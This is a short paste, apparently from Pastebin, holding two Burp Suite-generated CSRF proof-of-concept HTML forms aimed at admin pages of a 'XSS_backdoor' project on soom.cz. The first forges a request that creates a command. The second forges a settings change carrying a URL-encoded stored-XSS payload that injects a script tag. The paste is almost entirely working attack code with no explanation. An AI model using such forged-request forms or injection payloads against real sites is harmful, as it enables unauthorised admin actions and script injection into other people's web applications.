Advertisement
Guest User

Untitled

a guest
Jan 20th, 2017
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.44 KB | None | 0 0
  1. <html>
  2. <!-- CSRF PoC - generated by Burp Suite Professional -->
  3. <body>
  4. <h1>CSRF 1 - vytvoreni prikazu</h1>
  5. <form action="https://www.soom.cz/projects/XSS_backdoor/admin/prikaz.php" method="POST">
  6. <input type="hidden" name="nazev" value="xss" />
  7. <input type="hidden" name="typ" value="1" />
  8. <input type="hidden" name="parametry" value="xss" />
  9. <input type="hidden" name="skript" value="xss" />
  10. <input type="hidden" name="s1" value="Vytvo�&#153;it" />
  11. <input type="submit" value="Submit request" />
  12. </form>
  13. </body>
  14. </html>
  15.  
  16. <html>
  17. <!-- CSRF PoC - generated by Burp Suite Professional -->
  18. <body>
  19. <h1>CSRF 2 - stored xss</h1>
  20. <form action="https://www.soom.cz/projects/XSS_backdoor/admin/nastaveni.php?idclient=18f43d79bb" method="POST">
  21. <input type="hidden" name="nazev" value="xss" />
  22. <input type="hidden" name="url" value="http&#58;&#47;&#47;" />
  23. <input type="hidden" name="url1" value="http&#58;&#47;&#47;" />
  24. <input type="hidden" name="script" value="43" />
  25. <input type="hidden" name="script1" value="0" />
  26. <input type="hidden" name="parametry" value="zzzzz&#37;27&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#37;281&#37;29&#37;3C&#47;script&#37;3E" />
  27. <input type="hidden" name="parametry1" value="" />
  28. <input type="hidden" name="s1" value="Upravit" />
  29. <input type="submit" value="Submit request" />
  30. </form>
  31. </body>
  32. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement